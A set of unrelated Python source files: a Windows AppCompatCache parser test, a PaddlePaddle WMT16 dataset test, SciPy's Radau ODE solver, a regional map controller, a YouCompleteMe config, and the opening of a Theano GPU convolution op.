0x00, 0x04, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00,
0x40, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x20, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x01, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00
]))
class TestOutputWriter(output_writers.StdoutOutputWriter):
"""Output writer for testing.
Attributes:
cached_entries (list[AppCompatCacheCachedEntry]): Application Compatibility
Cache cached entries.
"""
def __init__(self):
"""Initializes an output writer object."""
super(TestOutputWriter, self).__init__()
self.cached_entries = []
def WriteCachedEntry(self, cached_entry):
"""Writes the Application Compatibility Cache cached entry to stdout.
Args:
cached_entry (AppCompatCacheCachedEntry): Application Compatibility
Cache cached entry.
"""
self.cached_entries.append(cached_entry)
class AppCompatCacheDataParserTest(test_lib.BaseTestCase):
"""Tests for the Application Compatibility Cache data parser."""
# pylint: disable=protected-access
def testCheckSignature(self):
"""Tests the CheckSignature function."""
parser = appcompatcache.AppCompatCacheDataParser()
format_type = parser.CheckSignature(_CACHE_DATA_WINDOWS_XP)
self.assertEqual(format_type, parser._FORMAT_TYPE_XP)
format_type = parser.CheckSignature(_CACHE_DATA_WINDOWS_2003)
self.assertEqual(format_type, parser._FORMAT_TYPE_2003)
format_type = parser.CheckSignature(_CACHE_DATA_WINDOWS_VISTA)
# TODO: add support to detect Vista format.
self.assertEqual(format_type, parser._FORMAT_TYPE_2003)
# TODO: add Windows 7 test.
format_type = parser.CheckSignature(_CACHE_DATA_WINDOWS_8_0)
self.assertEqual(format_type, parser._FORMAT_TYPE_8)
format_type = parser.CheckSignature(_CACHE_DATA_WINDOWS_8_1)
self.assertEqual(format_type, parser._FORMAT_TYPE_8)
format_type = parser.CheckSignature(_CACHE_DATA_WINDOWS_10)
self.assertEqual(format_type, parser._FORMAT_TYPE_10)
format_type = parser.CheckSignature(_CACHE_DATA_WINDOWS_10_CREATOR)
self.assertEqual(format_type, parser._FORMAT_TYPE_10)
# TODO: add bogus data tests.
def testParseHeader(self):
"""Tests the ParseHeader function."""
parser = appcompatcache.AppCompatCacheDataParser()
header_object = parser.ParseHeader(
parser._FORMAT_TYPE_XP, _CACHE_DATA_WINDOWS_XP)
self.assertIsNotNone(header_object)
header_object = parser.ParseHeader(
parser._FORMAT_TYPE_2003, _CACHE_DATA_WINDOWS_2003)
self.assertIsNotNone(header_object)
# TODO: fix Vista support.
# header_object = parser.ParseHeader(
# parser._FORMAT_TYPE_VISTA, _CACHE_DATA_WINDOWS_VISTA)
# self.assertIsNotNone(header_object)
# TODO: add Windows 7 test.
header_object = parser.ParseHeader(
parser._FORMAT_TYPE_8, _CACHE_DATA_WINDOWS_8_0)
self.assertIsNotNone(header_object)
header_object = parser.ParseHeader(
parser._FORMAT_TYPE_8, _CACHE_DATA_WINDOWS_8_1)
self.assertIsNotNone(header_object)
header_object = parser.ParseHeader(
parser._FORMAT_TYPE_10, _CACHE_DATA_WINDOWS_10)
self.assertIsNotNone(header_object)
# TODO: add bogus data tests.
class AppCompatCacheCollectorTest(test_lib.BaseTestCase):
"""Tests for the Application Compatibility Cache collector."""
def _CreateTestRegistry(self):
"""Creates Registry keys and values for testing.
Returns:
dfwinreg.WinRegistry: Windows Registry for testing.
"""
key_path_prefix = 'HKEY_LOCAL_MACHINE\\System'
registry_file = dfwinreg_fake.FakeWinRegistryFile(
key_path_prefix=key_path_prefix)
registry_key = dfwinreg_fake.FakeWinRegistryKey('Select')
registry_file.AddKeyByPath('\\', registry_key)
value_data = b'\x01\x00\x00\x00'
registry_value = dfwinreg_fake.FakeWinRegistryValue(
'Current', data=value_data, data_type=dfwinreg_definitions.REG_DWORD)
registry_key.AddValue(registry_value)
registry_key = dfwinreg_fake.FakeWinRegistryKey('AppCompatibility')
registry_file.AddKeyByPath(
'\\ControlSet001\\Control\\Session Manager', registry_key)
registry_value = dfwinreg_fake.FakeWinRegistryValue(
'AppCompatCache', data=_CACHE_DATA_WINDOWS_XP,
data_type=dfwinreg_definitions.REG_BINARY)
registry_key.AddValue(registry_value)
registry_file.Open(None)
registry = dfwinreg_registry.WinRegistry()
registry.MapFile(key_path_prefix, registry_file)
return registry
def testCollect(self):
"""Tests the Collect function."""
registry = self._CreateTestRegistry()
test_output_writer = TestOutputWriter()
collector_object = appcompatcache.AppCompatCacheCollector(
output_writer=test_output_writer)
result = collector_object.Collect(registry, all_control_sets=True)
self.assertTrue(result)
test_output_writer.Close()
self.assertEqual(len(collector_object.cached_entries), 1)
def testCollectEmpty(self):
"""Tests the Collect function on an empty Registry."""
registry = dfwinreg_registry.WinRegistry()
test_output_writer = TestOutputWriter()
collector_object = appcompatcache.AppCompatCacheCollector(
output_writer=test_output_writer)
result = collector_object.Collect(registry)
self.assertFalse(result)
test_output_writer.Close()
self.assertEqual(len(collector_object.cached_entries), 0)
if __name__ == '__main__':
unittest.main()
|
# Copyright (c) 2016 PaddlePaddle Authors. All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import paddle.dataset.wmt16
import unittest
class TestWMT16(unittest.TestCase):
def checkout_one_sample(self, sample):
        # train data has 3 fields: source language word indices,
        # target language word indices, and target next word indices.
self.assertEqual(len(sample), 3)
# test start mark and end mark in source word indices.
self.assertEqual(sample[0][0], 0)
self.assertEqual(sample[0][-1], 1)
        # test start mark in target word indices
self.assertEqual(sample[1][0], 0)
        # test end mark in target next word indices
self.assertEqual(sample[2][-1], 1)
def test_train(self):
for idx, sample in enumerate(
paddle.dataset.wmt16.train(
src_dict_size=100000, trg_dict_size=100000)()):
if idx >= 10: break
self.checkout_one_sample(sample)
def test_test(self):
for idx, sample in enumerate(
paddle.dataset.wmt16.test(
src_dict_size=1000, trg_dict_size=1000)()):
if idx >= 10: break
self.checkout_one_sample(sample)
def test_val(self):
for idx, sample in enumerate(
paddle.dataset.wmt16.validation(
src_dict_size=1000, trg_dict_size=1000)()):
if idx >= 10: break
self.checkout_one_sample(sample)
def test_get_dict(self):
dict_size = 1000
word_dict = paddle.dataset.wmt16.get_dict("en", dict_size, True)
self.assertEqual(len(word_dict), dict_size)
self.assertEqual(word_dict[0], "<s>")
self.assertEqual(word_dict[1], "<e>")
self.assertEqual(word_dict[2], "<unk>")
if __name__ == "__main__":
unittest.main()
|
from __future__ import division, print_function, absolute_import
import numpy as np
from scipy.linalg import lu_factor, lu_solve
from scipy.sparse import csc_matrix, issparse, eye
from scipy.sparse.linalg import splu
from scipy.optimize._numdiff import group_columns
from .common import (validate_max_step, validate_tol, select_initial_step,
norm, num_jac, EPS, warn_extraneous,
validate_first_step)
from .base import OdeSolver, DenseOutput
S6 = 6 ** 0.5
# Butcher tableau. A is not used directly, see below.
C = np.array([(4 - S6) / 10, (4 + S6) / 10, 1])
E = np.array([-13 - 7 * S6, -13 + 7 * S6, -1]) / 3
# Eigendecomposition of A is done: A = T L T**-1. There is 1 real eigenvalue
# and a complex conjugate pair. They are written below.
MU_REAL = 3 + 3 ** (2 / 3) - 3 ** (1 / 3)
MU_COMPLEX = (3 + 0.5 * (3 ** (1 / 3) - 3 ** (2 / 3))
- 0.5j * (3 ** (5 / 6) + 3 ** (7 / 6)))
# These are transformation matrices.
T = np.array([
[0.09443876248897524, -0.14125529502095421, 0.03002919410514742],
[0.25021312296533332, 0.20412935229379994, -0.38294211275726192],
[1, 1, 0]])
TI = np.array([
[4.17871859155190428, 0.32768282076106237, 0.52337644549944951],
[-4.17871859155190428, -0.32768282076106237, 0.47662355450055044],
[0.50287263494578682, -2.57192694985560522, 0.59603920482822492]])
# These linear combinations are used in the algorithm.
TI_REAL = TI[0]
TI_COMPLEX = TI[1] + 1j * TI[2]
# Interpolator coefficients.
P = np.array([
[13/3 + 7*S6/3, -23/3 - 22*S6/3, 10/3 + 5 * S6],
[13/3 - 7*S6/3, -23/3 + 22*S6/3, 10/3 - 5 * S6],
[1/3, -8/3, 10/3]])
NEWTON_MAXITER = 6 # Maximum number of Newton iterations.
MIN_FACTOR = 0.2 # Minimum allowed decrease in a step size.
MAX_FACTOR = 10 # Maximum allowed increase in a step size.
def solve_collocation_system(fun, t, y, h, Z0, scale, tol,
LU_real, LU_complex, solve_lu):
"""Solve the collocation system.
Parameters
----------
fun : callable
Right-hand side of the system.
t : float
Current time.
y : ndarray, shape (n,)
Current state.
h : float
Step to try.
Z0 : ndarray, shape (3, n)
Initial guess for the solution. It determines new values of `y` at
``t + h * C`` as ``y + Z0``, where ``C`` is the Radau method constants.
scale : float
Problem tolerance scale, i.e. ``rtol * abs(y) + atol``.
tol : float
        Tolerance to which to solve the system. This value is compared with
        the error normalized by `scale`.
LU_real, LU_complex
LU decompositions of the system Jacobians.
solve_lu : callable
Callable which solves a linear system given a LU decomposition. The
signature is ``solve_lu(LU, b)``.
Returns
-------
converged : bool
Whether iterations converged.
n_iter : int
Number of completed iterations.
Z : ndarray, shape (3, n)
Found solution.
rate : float
The rate of convergence.
"""
n = y.shape[0]
M_real = MU_REAL / h
M_complex = MU_COMPLEX / h
W = TI.dot(Z0)
Z = Z0
F = np.empty((3, n))
ch = h * C
dW_norm_old = None
dW = np.empty_like(W)
converged = False
for k in range(NEWTON_MAXITER):
for i in range(3):
F[i] = fun(t + ch[i], y + Z[i])
if not np.all(np.isfinite(F)):
break
f_real = F.T.dot(TI_REAL) - M_real * W[0]
f_complex = F.T.dot(TI_COMPLEX) - M_complex * (W[1] + 1j * W[2])
dW_real = solve_lu(LU_real, f_real)
dW_complex = solve_lu(LU_complex, f_complex)
dW[0] = dW_real
dW[1] = dW_complex.real
dW[2] = dW_complex.imag
dW_norm = norm(dW / scale)
if dW_norm_old is not None:
rate = dW_norm / dW_norm_old
else:
rate = None
if (rate is not None and (rate >= 1 or
rate ** (NEWTON_MAXITER - k) / (1 - rate) * dW_norm > tol)):
break
W += dW
Z = T.dot(W)
if (dW_norm == 0 or
rate is not None and rate / (1 - rate) * dW_norm < tol):
converged = True
break
dW_norm_old = dW_norm
return converged, k + 1, Z, rate
def predict_factor(h_abs, h_abs_old, error_norm, error_norm_old):
"""Predict by which factor to increase/decrease the step size.
The algorithm is described in [1]_.
Parameters
----------
h_abs, h_abs_old : float
Current and previous values of the step size, `h_abs_old` can be None
(see Notes).
error_norm, error_norm_old : float
Current and previous values of the error norm, `error_norm_old` can
be None (see Notes).
Returns
-------
factor : float
Predicted factor.
Notes
-----
If `h_abs_old` and `error_norm_old` are both not None then a two-step
algorithm is used, otherwise a one-step algorithm is used.
References
----------
    .. [1] E. Hairer, S. P. Norsett and G. Wanner, "Solving Ordinary Differential
Equations II: Stiff and Differential-Algebraic Problems", Sec. IV.8.
"""
if error_norm_old is None or h_abs_old is None or error_norm == 0:
multiplier = 1
else:
multiplier = h_abs / h_abs_old * (error_norm_old / error_norm) ** 0.25
with np.errstate(divide='ignore'):
factor = min(1, multiplier) * error_norm ** -0.25
return factor
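# Illustrative check of predict_factor (numbers chosen for the example only):
# with h_abs=0.10, h_abs_old=0.08, error_norm=0.5 and error_norm_old=0.9 the
# two-step branch gives multiplier = (0.10 / 0.08) * (0.9 / 0.5) ** 0.25 ~ 1.45,
# so factor = min(1, 1.45) * 0.5 ** -0.25 ~ 1.19, i.e. a modest step increase.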
class Radau(OdeSolver):
"""Implicit Runge-Kutta method of Radau IIA family of order 5.
The implementation follows [1]_. The error is controlled with a
third-order accurate embedded formula. A cubic polynomial which satisfies
the collocation conditions is used for the dense output.
Parameters
----------
fun : callable
Right-hand side of the system. The calling signature is ``fun(t, y)``.
Here ``t`` is a scalar, and there are two options for the ndarray ``y``:
It can either have shape (n,); then ``fun`` must return array_like with
shape (n,). Alternatively it can have shape (n, k); then ``fun``
must return an array_like with shape (n, k), i.e. each column
corresponds to a single column in ``y``. The choice between the two
options is determined by `vectorized` argument (see below). The
vectorized implementation allows a faster approximation of the Jacobian
by finite differences (required for this solver).
t0 : float
Initial time.
y0 : array_like, shape (n,)
Initial state.
t_bound : float
Boundary time - the integration won't continue beyond it. It also
determines the direction of the integration.
first_step : float or None, optional
Initial step size. Default is ``None`` which means that the algorithm
should choose.
max_step : float, optional
Maximum allowed step size. Default is np.inf, i.e. the step size is not
bounded and determined solely by the solver.
rtol, atol : float and array_like, optional
Relative and absolute tolerances. The solver keeps the local error
estimates less than ``atol + rtol * abs(y)``. Here `rtol` controls a
relative accuracy (number of correct digits). But if a component of `y`
is approximately below `atol`, the error only needs to fall within
the same `atol` threshold, and the number of correct digits is not
guaranteed. If components of y have different scales, it might be
beneficial to set different `atol` values for different components by
passing array_like with shape (n,) for `atol`. Default values are
1e-3 for `rtol` and 1e-6 for `atol`.
jac : {None, array_like, sparse_matrix, callable}, optional
Jacobian matrix of the right-hand side of the system with respect to
y, required by this method. The Jacobian matrix has shape (n, n) and
its element (i, j) is equal to ``d f_i / d y_j``.
There are three ways to define the Jacobian:
* If array_like or sparse_matrix, the Jacobian is assumed to
be constant.
* If callable, the Jacobian is assumed to depend on both
t and y; it will be called as ``jac(t, y)`` as necessary.
For the 'Radau' and 'BDF' methods, the return value might be a
sparse matrix.
* If None (default), the Jacobian will be approximated by
finite differences.
It is generally recommended to provide the Jacobian rather than
relying on a finite-difference approximation.
jac_sparsity : {None, array_like, sparse matrix}, optional
Defines a sparsity structure of the Jacobian matrix for a
finite-difference approximation. Its shape must be (n, n). This argument
is ignored if `jac` is not `None`. If the Jacobian has only few non-zero
elements in *each* row, providing the sparsity structure will greatly
speed up the computations [2]_. A zero entry means that a corresponding
element in the Jacobian is always zero. If None (default), the Jacobian
is assumed to be dense.
vectorized : bool, optional
Whether `fun` is implemented in a vectorized fashion. Default is False.
Attributes
----------
n : int
Number of equations.
status : string
Current status of the solver: 'running', 'finished' or 'failed'.
t_bound : float
Boundary time.
direction : float
Integration direction: +1 or -1.
t : float
Current time.
y : ndarray
Current state.
t_old : float
Previous time. None if no steps were made yet.
step_size : float
Size of the last successful step. None if no steps were made yet.
nfev : int
Number of evaluations of the right-hand side.
njev : int
Number of evaluations of the Jacobian.
nlu : int
Number of LU decompositions.
References
----------
.. [1] E. Hairer, G. Wanner, "Solving Ordinary Differential Equations II:
Stiff and Differential-Algebraic Problems", Sec. IV.8.
.. [2] A. Curtis, M. J. D. Powell, and J. Reid, "On the estimation of
sparse Jacobian matrices", Journal of the Institute of Mathematics
and its Applications, 13, pp. 117-120, 1974.
"""
def __init__(self, fun, t0, y0, t_bound, max_step=np.inf,
rtol=1e-3, atol=1e-6, jac=None, jac_sparsity=None,
vectorized=False, first_step=None, **extraneous):
warn_extraneous(extraneous)
super(Radau, self).__init__(fun, t0, y0, t_bound, vectorized)
self.y_old = None
self.max_step = validate_max_step(max_step)
self.rtol, self.atol = validate_tol(rtol, atol, self.n)
self.f = self.fun(self.t, self.y)
# Select initial step assuming the same order which is used to control
# the error.
if first_step is None:
self.h_abs = select_initial_step(
self.fun, self.t, self.y, self.f, self.direction,
3, self.rtol, self.atol)
else:
self.h_abs = validate_first_step(first_step, t0, t_bound)
self.h_abs_old = None
self.error_norm_old = None
self.newton_tol = max(10 * EPS / rtol, min(0.03, rtol ** 0.5))
self.sol = None
self.jac_factor = None
self.jac, self.J = self._validate_jac(jac, jac_sparsity)
if issparse(self.J):
def lu(A):
self.nlu += 1
return splu(A)
def solve_lu(LU, b):
return LU.solve(b)
I = eye(self.n, format='csc')
else:
def lu(A):
self.nlu += 1
return lu_factor(A, overwrite_a=True)
def solve_lu(LU, b):
return lu_solve(LU, b, overwrite_b=True)
I = np.identity(self.n)
self.lu = lu
self.solve_lu = solve_lu
self.I = I
self.current_jac = True
self.LU_real = None
self.LU_complex = None
self.Z = None
def _validate_jac(self, jac, sparsity):
t0 = self.t
y0 = self.y
if jac is None:
if sparsity is not None:
if issparse(sparsity):
sparsity = csc_matrix(sparsity)
groups = group_columns(sparsity)
sparsity = (sparsity, groups)
def jac_wrapped(t, y, f):
self.njev += 1
J, self.jac_factor = num_jac(self.fun_vectorized, t, y, f,
self.atol, self.jac_factor,
sparsity)
return J
J = jac_wrapped(t0, y0, self.f)
elif callable(jac):
J = jac(t0, y0)
self.njev = 1
if issparse(J):
J = csc_matrix(J)
def jac_wrapped(t, y, _=None):
self.njev += 1
return csc_matrix(jac(t, y), dtype=float)
else:
J = np.asarray(J, dtype=float)
def jac_wrapped(t, y, _=None):
self.njev += 1
return np.asarray(jac(t, y), dtype=float)
if J.shape != (self.n, self.n):
raise ValueError("`jac` is expected to have shape {}, but "
"actually has {}."
.format((self.n, self.n), J.shape))
else:
if issparse(jac):
J = csc_matrix(jac)
else:
J = np.asarray(jac, dtype=float)
if J.shape != (self.n, self.n):
raise ValueError("`jac` is expected to have shape {}, but "
"actually has {}."
.format((self.n, self.n), J.shape))
jac_wrapped = None
return jac_wrapped, J
def _step_impl(self):
t = self.t
y = self.y
f = self.f
max_step = self.max_step
atol = self.atol
rtol = self.rtol
min_step = 10 * np.abs(np.nextafter(t, self.direction * np.inf) - t)
if self.h_abs > max_step:
h_abs = max_step
h_abs_old = None
error_norm_old = None
elif self.h_abs < min_step:
h_abs = min_step
h_abs_old = None
error_norm_old = None
else:
h_abs = self.h_abs
h_abs_old = self.h_abs_old
error_norm_old = self.error_norm_old
J = self.J
LU_real = self.LU_real
LU_complex = self.LU_complex
current_jac = self.current_jac
jac = self.jac
rejected = False
step_accepted = False
message = None
while not step_accepted:
if h_abs < min_step:
return False, self.TOO_SMALL_STEP
h = h_abs * self.direction
t_new = t + h
if self.direction * (t_new - self.t_bound) > 0:
t_new = self.t_bound
h = t_new - t
h_abs = np.abs(h)
if self.sol is None:
Z0 = np.zeros((3, y.shape[0]))
else:
Z0 = self.sol(t + h * C).T - y
scale = atol + np.abs(y) * rtol
converged = False
while not converged:
if LU_real is None or LU_complex is None:
LU_real = self.lu(MU_REAL / h * self.I - J)
LU_complex = self.lu(MU_COMPLEX / h * self.I - J)
converged, n_iter, Z, rate = solve_collocation_system(
self.fun, t, y, h, Z0, scale, self.newton_tol,
LU_real, LU_complex, self.solve_lu)
if not converged:
if current_jac:
break
J = self.jac(t, y, f)
current_jac = True
LU_real = None
LU_complex = None
if not converged:
h_abs *= 0.5
LU_real = None
LU_complex = None
continue
y_new = y + Z[-1]
ZE = Z.T.dot(E) / h
error = self.solve_lu(LU_real, f + ZE)
scale = atol + np.maximum(np.abs(y), np.abs(y_new)) * rtol
error_norm = norm(error / scale)
safety = 0.9 * (2 * NEWTON_MAXITER + 1) / (2 * NEWTON_MAXITER
+ n_iter)
if rejected and error_norm > 1:
error = self.solve_lu(LU_real, self.fun(t, y + error) + ZE)
error_norm = norm(error / scale)
if error_norm > 1:
factor = predict_factor(h_abs, h_abs_old,
error_norm, error_norm_old)
h_abs *= max(MIN_FACTOR, safety * factor)
LU_real = None
LU_complex = None
rejected = True
else:
step_accepted = True
recompute_jac = jac is not None and n_iter > 2 and rate > 1e-3
factor = predict_factor(h_abs, h_abs_old, error_norm, error_norm_old)
factor = min(MAX_FACTOR, safety * factor)
if not recompute_jac and factor < 1.2:
factor = 1
else:
LU_real = None
LU_complex = None
f_new = self.fun(t_new, y_new)
if recompute_jac:
J = jac(t_new, y_new, f_new)
current_jac = True
elif jac is not None:
current_jac = False
self.h_abs_old = self.h_abs
self.error_norm_old = error_norm
self.h_abs = h_abs * factor
self.y_old = y
self.t = t_new
self.y = y_new
self.f = f_new
self.Z = Z
self.LU_real = LU_real
self.LU_complex = LU_complex
self.current_jac = current_jac
self.J = J
self.t_old = t
self.sol = self._compute_dense_output()
return step_accepted, message
def _compute_dense_output(self):
Q = np.dot(self.Z.T, P)
return RadauDenseOutput(self.t_old, self.t, self.y_old, Q)
def _dense_output_impl(self):
return self.sol
class RadauDenseOutput(DenseOutput):
def __init__(self, t_old, t, y_old, Q):
super(RadauDenseOutput, self).__init__(t_old, t)
self.h = t - t_old
self.Q = Q
self.order = Q.shape[1] - 1
self.y_old = y_old
def _call_impl(self, t):
x = (t - self.t_old) / self.h
if t.ndim == 0:
p = np.tile(x, self.order + 1)
p = np.cumprod(p)
else:
p = np.tile(x, (self.order + 1, 1))
p = np.cumprod(p, axis=0)
        # Note: we intentionally do not multiply by h here.
y = np.dot(self.Q, p)
if y.ndim == 2:
y += self.y_old[:, None]
else:
y += self.y_old
return y
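# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original module): this solver is
# normally reached through the public scipy.integrate API by passing
# method='Radau' to solve_ivp. The small stiff linear system below is
# illustrative only; running this file directly would fail on its relative
# imports first, so the snippet is best copied into a separate script.
if __name__ == '__main__':
    from scipy.integrate import solve_ivp

    def _demo_rhs(t, y):
        # Mildly stiff 2x2 linear test problem y' = A y.
        return [-1000.0 * y[0] + y[1], y[0] - 2.0 * y[1]]

    def _demo_jac(t, y):
        # Constant Jacobian of the system above; supplying it avoids the
        # finite-difference approximation.
        return [[-1000.0, 1.0], [1.0, -2.0]]

    _sol = solve_ivp(_demo_rhs, (0.0, 1.0), [1.0, 0.0], method='Radau',
                     jac=_demo_jac, rtol=1e-6, atol=1e-9)
    print(_sol.t[-1], _sol.y[:, -1])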
|
import sys
sys.path.append('../../')
from lib.cilok import urlEncode16, tokenuri, setTTL, keyuri
from lib.sampeu import getWMTS
from apps.models import calendar
from apps.templates import batik
class Controller(object):
def home(self,uridt='null'):
provinsi = 'pabar'
provloc = '132.747602, -2.303933'
mapzoom = '8'
kabkotcord = [
'132.273454, -2.875830',
'134.089396, -3.529163',
'134.410378, -2.965049',
'133.272067, -1.872531',
'133.701069, -1.206365',#Manokwari
'132.206084, -1.733357',
'131.562871, -1.137346',#sorong
'130.883917, -1.035028',
'132.408301, -0.649349',
'132.293779, -1.286889',
'134.003835, -1.588732',#mS
'133.885090, -0.795815',#manokcity
'131.277227, -0.838014'#sorong
]
listkabkot = [
'%9101%','%9102%','%9103%','%9104%','%9105%','%9106%','%9107%','%9108%','%9109%','%9110%',
'%9111%','%9112%',
'%9171%'
]
batik.provinsi(provinsi,listkabkot,provloc,mapzoom,kabkotcord)
cal = calendar.Calendar()
dt = {}
for kabkot in listkabkot:
dt[kabkot]=cal.getYearCountKabKot(str(int(kabkot[1:3])),str(int(kabkot[3:5])),uridt)
cal.close()
dt['%WMTS%']=getWMTS()
dt['%PERIODE%']=uridt
dt['%LAMAN INDONESIA%']=urlEncode16(keyuri+'%peta%home'+'%'+uridt)
dt['%TAHUN SEBELUMNYA%']=urlEncode16(keyuri+'%'+provinsi+'%home'+'%'+str(int(uridt)-1))
dt['%TAHUN SETELAHNYA%']=urlEncode16(keyuri+'%'+provinsi+'%home'+'%'+str(int(uridt)+1))
return dt
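# Hedged note: Controller.home() returns a dict of template placeholders
# (e.g. '%9101%', '%WMTS%', '%PERIODE%') mapped to rendered values; the
# '%91xx%' keys appear to be BPS region codes for West Papua (Papua Barat)
# regencies/cities, and their values are per-year counts pulled from
# calendar.Calendar.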
|
# Generated by YCM Generator at 2019-11-01 00:52:51.366837
# This file is NOT licensed under the GPLv3, which is the license for the rest
# of YouCompleteMe.
#
# Here's the license text for this file:
#
# This is free and unencumbered software released into the public domain.
#
# Anyone is free to copy, modify, publish, use, compile, sell, or
# distribute this software, either in source code form or as a compiled
# binary, for any purpose, commercial or non-commercial, and by any
# means.
#
# In jurisdictions that recognize copyright laws, the author or authors
# of this software dedicate any and all copyright interest in the
# software to the public domain. We make this dedication for the benefit
# of the public at large and to the detriment of our heirs and
# successors. We intend this dedication to be an overt act of
# relinquishment in perpetuity of all present and future rights to this
# software under copyright law.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# For more information, please refer to <http://unlicense.org/>
import os
import ycm_core
flags = [
'-x',
'c++',
'-I../../utils/',
]
# Set this to the absolute path to the folder (NOT the file!) containing the
# compile_commands.json file to use that instead of 'flags'. See here for
# more details: http://clang.llvm.org/docs/JSONCompilationDatabase.html
#
# You can get CMake to generate this file for you by adding:
# set( CMAKE_EXPORT_COMPILE_COMMANDS 1 )
# to your CMakeLists.txt file.
#
# Most projects will NOT need to set this to anything; you can just change the
# 'flags' list of compilation flags. Notice that YCM itself uses that approach.
compilation_database_folder = ''
if os.path.exists( compilation_database_folder ):
database = ycm_core.CompilationDatabase( compilation_database_folder )
else:
database = None
SOURCE_EXTENSIONS = [ '.C', '.cpp', '.cxx', '.cc', '.c', '.m', '.mm' ]
def DirectoryOfThisScript():
return os.path.dirname( os.path.abspath( __file__ ) )
def MakeRelativePathsInFlagsAbsolute( flags, working_directory ):
if not working_directory:
return list( flags )
new_flags = []
make_next_absolute = False
path_flags = [ '-isystem', '-I', '-iquote', '--sysroot=' ]
for flag in flags:
new_flag = flag
if make_next_absolute:
make_next_absolute = False
if not flag.startswith( '/' ):
new_flag = os.path.join( working_directory, flag )
for path_flag in path_flags:
if flag == path_flag:
make_next_absolute = True
break
if flag.startswith( path_flag ):
path = flag[ len( path_flag ): ]
new_flag = path_flag + os.path.join( working_directory, path )
break
if new_flag:
new_flags.append( new_flag )
return new_flags
def IsHeaderFile( filename ):
extension = os.path.splitext( filename )[ 1 ]
return extension in [ '.H', '.h', '.hxx', '.hpp', '.hh' ]
def GetCompilationInfoForFile( filename ):
# The compilation_commands.json file generated by CMake does not have entries
# for header files. So we do our best by asking the db for flags for a
# corresponding source file, if any. If one exists, the flags for that file
# should be good enough.
if IsHeaderFile( filename ):
basename = os.path.splitext( filename )[ 0 ]
for extension in SOURCE_EXTENSIONS:
replacement_file = basename + extension
if os.path.exists( replacement_file ):
compilation_info = database.GetCompilationInfoForFile(
replacement_file )
if compilation_info.compiler_flags_:
return compilation_info
return None
return database.GetCompilationInfoForFile( filename )
def FlagsForFile( filename, **kwargs ):
if database:
# Bear in mind that compilation_info.compiler_flags_ does NOT return a
# python list, but a "list-like" StringVec object
compilation_info = GetCompilationInfoForFile( filename )
if not compilation_info:
return None
final_flags = MakeRelativePathsInFlagsAbsolute(
compilation_info.compiler_flags_,
compilation_info.compiler_working_dir_ )
else:
relative_to = DirectoryOfThisScript()
final_flags = MakeRelativePathsInFlagsAbsolute( flags, relative_to )
return {
'flags': final_flags,
'do_cache': True
}
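# Hedged usage note: YouCompleteMe typically picks this file up when it is
# saved as .ycm_extra_conf.py at the project root (or pointed to via the
# g:ycm_global_ycm_extra_conf Vim option) and calls FlagsForFile() for each
# translation unit it needs flags for.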
|
from __future__ import print_function
import numpy
import theano.tensor as T
from theano.misc import strutil
import theano
from six.moves import xrange
from theano.tensor.nnet.ConvTransp3D import ConvTransp3D, computeR
from theano.gof import local_optimizer
from theano.sandbox.cuda.basic_ops import as_cuda_ndarray_variable
from theano.sandbox.cuda.opt import gpu_optimizer
from theano.sandbox.cuda import (CudaNdarrayType, HostFromGpu,
host_from_gpu, GpuOp)
class GpuConvTransp3D(GpuOp):
"""
The gpu version of ConvTransp3D.
"""
def __eq__(self, other):
return type(self) == type(other)
def __hash__(self):
return hash(type(self))
def make_node(self, W, b, d, H, RShape=None):
W_ = as_cuda_ndarray_variable(W)
b_ = as_cuda_ndarray_variable(b)
d_ = T.as_tensor_variable(d)
H_ = as_cuda_ndarray_variable(H)
if RShape:
RShape_ = T.as_tensor_variable(RShape)
else:
RShape_ = T.as_tensor_variable([-1, -1, -1])
return theano.Apply(self, inputs=[W_, b_, d_, H_, RShape_],
outputs=[CudaNdarrayType(dtype=H_.dtype,
broadcastable=(False,)*5)()])
def infer_shape(self, node, input_shapes):
W, b, d, H, RShape = node.inputs
W_shape, b_shape, d_shape, H_shape, RShape_shape = input_shapes
return [(H_shape[0], W_shape[1], RShape[0], RShape[1], RShape[2])]
def perform_(self, node, inputs, output_storage):
W, b, d, H, RShape = inputs
print("\t\t\t\tGpuConvTransp3D python code still uses old format")
output_storage[0][0] = computeR(W, b, d, H, RShape)
def c_code_cache_version(self):
return ()
def c_code(self, node, nodename, inputs, outputs, sub):
W, b, d, H, RShape = inputs
fail = sub['fail']
R = outputs[0]
codeSource = """
///////////// < code generated by GpuConvTransp3D >
//printf("\t\t\t\tGpuConvTransp c code\\n");
//Check dimensionality of inputs
if (CudaNdarray_NDIM(%(H)s) != 5)
{
PyErr_Format(PyExc_ValueError, "GpuConvTransp3D: H must be a 5-D tensor but it is %%i-D", CudaNdarray_NDIM(%(H)s));
%(fail)s
}
if (CudaNdarray_NDIM(%(W)s) != 5)
{
PyErr_Format(PyExc_ValueError, "GpuConvTransp3D: W must be a 5-D tensor");
%(fail)s
}
if (CudaNdarray_NDIM(%(b)s) != 1)
{
PyErr_Format(PyExc_ValueError, "GpuConvTransp3D: b must be a vector");
%(fail)s
}
if (PyArray_NDIM(%(d)s) != 1)
{
PyErr_Format(PyExc_ValueError, "GpuConvTransp3D: d must be a vector");
%(fail)s
}
//Read and check stride arguments
